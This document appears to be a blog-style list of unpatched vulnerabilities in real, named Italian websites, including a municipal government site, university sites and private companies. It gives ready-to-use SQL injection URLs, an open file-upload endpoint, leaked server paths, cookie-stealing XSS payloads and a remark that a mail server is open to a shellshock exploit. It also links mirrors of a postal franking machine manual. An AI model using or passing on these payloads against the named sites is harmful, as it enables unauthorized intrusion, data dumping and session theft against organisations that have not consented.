pro(re)gress

Joomla com_fabrik vulnerabilities raise the error related to sql injection http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- archived: http://archive.is/1Up6B Upload vulnerability http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 archived:http://archive.is/6XtTl path (leaked from the errors) /web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste italiane - Affrancatrice Polivalente PT100SV (Elettronica Meccanica Sistemi S.P.A.) - manuale per l'operatore Manuale Software PT100SV Release A8C6 Qui il download del manuale Mirror: filefactory.com http://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf share-online.biz http://www.share-online.biz/dl/GRQZM4YOUSV sendmyway.com https://www.sendmyway.com/bgktennfvwqz gigapeta.com http://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it We can start to detect the version manually (automated tools, like joomscan, are giving random values) from http://lesim1.ing.unisannio.it/configuration.php-dist 1.5.x archived:http://archive.is/VB6I3 libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26. components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23. (Tip: I just used files and folder comparison with beyond compare, but you can also use Meld on linux) To get the path we try to raise errors with wrong sql queries. In this case we are abusing of the weblinks component and adding the filter_order even if the site uses SEF urls (who cares). http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order= to get an output like this: No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHER

http://www.sannioeuropa.com Joomla 1.0.12  - the version is enough to understand all the possible problems involved

http://www.orientamento.unisannio.it The website uses phpnuke with some customizations (sometimes it detects that we are trying to abuse of specific bugs) we can find the path from the Deprecated notices in various modules /var/www/html/copus/home/copus/modules/ ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25 register_globals seems to be On and the variables can be replaced by using post/get requests. Supposed version <=PHP-Nuke-6.9 since banners.php exists In banners.php we have switch($op) { ... } sample http://www.orientamento.unisannio.it/banners.php?op=login By using, for example, this url: http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc the sql is executed and we can dump the data instead of the banners File via sql http://www.orientamento.unisannio.it/banners.

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca ex.: http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca archived with sample javascript text: http://archive.is/To5A4

http://www.dietnutrition.it/ /home2/uydietnu/public_html/ With various requests you can get an error like: Fatal error : Maximum execution time of 120 seconds exceeded in  /home2/uydietnu/public_html/tools/smarty/sysplugins/smarty_internal_cacheresource_file.php  on line  196

  http://www.carminevalentino.it/ Path can be seen in the 404 error pages D:\inetpub\webs\carminevalentinoit\ XSS http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1 http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1 and we can place any video in the content Example: http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1 shortened url:  https://goo.gl/sWhg1P archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech is usually sending spam emails. There's a fake unsubscribe script that reports the removal of anything, even if you add a simple xss. http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com ____ The mail server can be exploited with an old remote exploit for postfix on debian linux. (shellshock)

simple xss http://www.qumran2.net/indice.php?parole=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&p=barra_ric